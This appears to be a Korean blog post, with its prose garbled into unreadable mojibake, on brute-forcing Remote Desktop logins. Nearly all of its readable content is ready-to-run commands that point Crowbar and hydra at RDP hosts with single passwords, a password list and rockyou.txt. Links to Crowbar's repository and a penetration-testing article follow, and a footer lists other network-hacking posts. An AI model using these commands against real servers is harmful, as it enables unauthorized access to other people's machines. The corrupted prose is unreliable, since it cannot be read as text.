์ฌํ๊ทผ๋ฌด๊ฐ ์ฆ์์ง ์์ฆ RDP(Remote Desktop Protocol)๋ฅผ ์ฌ์ฉํ๋ ์ ์ ๋ค์ด ๊ฝค๋ ๋ง์์ก๋ค.
์ด๋ฐ ์๋์ ํ๋ฆ์ ๋ง์ถฐ์ RDP๋ฅผ ๊ณต๊ฒฉํ๋ ๋ค์ํ ๊ณต๊ฒฉ ๋๊ตฌ๋ค์ด ์๊ฒจ๋ฌ๋๋ฐ, ๊ทธ์ค ํ๋๊ฐ ์ฌ์ ๊ณต๊ฒฉ์ ๋์์ฃผ๋ Crowbar๊ฐ ์๋ค.
๋๊ตฌ๋ฅผ ์ฌ์ฉํ๊ธฐ ์ด์ ์ ๋ฆฌ๋ ์ค์ freerdp๊ฐ ์ค์น๋์ด์์ด์ผ ํจ
sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer
[์ฌ์ฉ ๋ช ๋ น์ด]
./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456
./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist
hydra๋ก๋ ๊ฐ๋ฅํ๋ค.
[์ฌ์ฉ ๋ช ๋ น์ด]
hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://192.168.1.1
crowbar ๊นํ๋ธ:
https://github.com/galkan/crowbar
GitHub - galkan/crowbar: Crowbar is brute forcing tool that can be used during penetration tests. It is developed to support pro
Crowbar is brute forcing tool that can be used during penetration tests. It is developed to support protocols that are not currently supported by thc-hydra and other popular brute forcing tools. -...
github.com
์ฐธ๊ณ :
https://www.pwndefend.com/2018/07/24/hail-hydra-rdp-brute-forcing-with-hydra/
Hail Hydra – RDP brute forcing with HYDRA – PwnDefend
Securing services requires a broad range of knowledge of operating systems, networking, protocols and offensive capabilities. So I thought I would demonstrate some testing methods to show how a control is effective in blocking certain types of attack, so h
www.pwndefend.com
์ฐธ๊ณ ์์:
https://www.youtube.com/watch?v=ql7opGQ3czE&ab_channel=LoiLiangYang
'๐์ ๋ณด๋ณด์ > ๋คํธ์ํฌ ๋ณด์' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
๋ฆฌ๋ ์ค - ssh ์ฐ๊ฒฐ์ tor socks5 ๊ฒฝ์ ํ๊ธฐ (0) | 2022.08.01 |
---|---|
๋คํธ์ํฌ ํดํน - ettercap์ arp ์คํธํ์ ์ด์ฉํด dns ์คํธํํ๊ธฐ (0) | 2021.12.22 |
๋คํธ์ํฌ ํดํน - Tor ProxyChains ๋ก์ปฌ ํ๋ก์ ์ค์ (0) | 2021.12.15 |
๋คํธ์ํฌ ํดํน - medua, ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ ๋๊ตฌ (0) | 2021.11.22 |
๋คํธ์ํฌ ํดํน - hydra, ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ ๋๊ตฌ (0) | 2021.11.22 |